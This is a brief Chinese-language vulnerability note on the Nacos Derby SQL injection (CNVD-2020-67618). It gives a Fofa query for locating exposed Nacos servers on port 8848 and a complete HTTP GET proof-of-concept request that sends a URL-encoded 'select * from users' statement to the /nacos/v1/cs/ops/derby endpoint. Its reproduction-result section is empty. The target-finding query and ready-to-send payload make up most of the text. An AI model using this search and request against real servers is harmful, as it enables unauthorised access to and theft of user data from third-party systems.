漏洞描述:
Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。
搜索语法:
Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"
漏洞详情:
1.Nacos服务系统。
2.漏洞POC:
GET /nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Accept-Encoding: gzip
3.漏洞复现结果。